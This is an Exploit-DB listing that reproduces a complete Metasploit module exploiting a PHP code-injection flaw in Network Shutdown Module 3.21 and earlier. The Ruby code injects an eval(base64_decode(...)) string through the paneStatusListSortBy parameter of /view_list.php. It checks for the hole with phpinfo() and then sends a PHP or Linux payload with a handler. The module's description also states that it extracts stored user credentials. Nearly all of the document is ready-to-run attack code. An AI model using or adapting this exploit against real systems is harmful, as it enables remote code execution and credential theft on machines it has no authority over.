Network Shutdown Module 3.21 - 'sort_values' Remote PHP Code Injection (Metasploit)

EDB-ID:

23006

CVE:





Platform:

PHP

Date:

2012-11-29


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::PhpEXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
			'Description'    => %q{
				This module exploits a vulnerability in lib/dbtools.inc which uses
				unsanitized user input inside a eval() call. Additionally the base64 encoded
				user credentials are extracted from the database of the application. Please
				note that in order to be able to steal credentials, the vulnerable service
				must have at least one USV module (an entry in the "nodes" table in mgedb.db)
			},
			'Author'         =>
				[
					'h0ng10',  # original discovery, msf module
					'sinn3r'   # PhpEXE shizzle
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['OSVDB', '83199'],
					['URL', 'http://secunia.com/advisories/49103/']
				],
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 4000
				},
			'Platform'       => ['php', 'linux'],
			'Arch'           => ARCH_PHP,

			'Targets'        =>
				[
					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
					[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
				],
			'DefaultTarget'  => 0,
			'Privileged'     => true,
			'DisclosureDate' => 'Jun 26 2012'
		))

		register_options(
			[
				Opt::RPORT(4679)
			], self.class)
	end

	def check
		# we use a call to phpinfo() for verification
		res = execute_php_code("phpinfo();die();")

		if not res or res.code != 200
			print_error("Failed: Error requesting page")
			return CheckCode::Unknown
		end

		return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
		return CheckCode::Safe
	end

	def execute_php_code(code, opts = {})
		param_name = rand_text_alpha(6)
		padding    = rand_text_alpha(6)
		url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

		res = send_request_cgi(
			{
				'uri'   =>  '/view_list.php',
				'method' => 'POST',
				'vars_get' =>
					{
						'paneStatusListSortBy' => url_param,
					},
				'vars_post' =>
					{
						param_name => Rex::Text.encode_base64(code),
					},
				'headers' =>
					{
						'Connection' => 'Close',
					}
			})
	end

	def no_php_tags(p)
		p = p.gsub(/^<\?php /, '')
		p.gsub(/ \?\>$/, '')
	end

	def exploit
		print_status("#{rhost}:#{rport} - Sending payload")

		unlink = (target['Platform'] == 'linux') ? true : false
		p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

		execute_php_code(p)
		handler
	end
end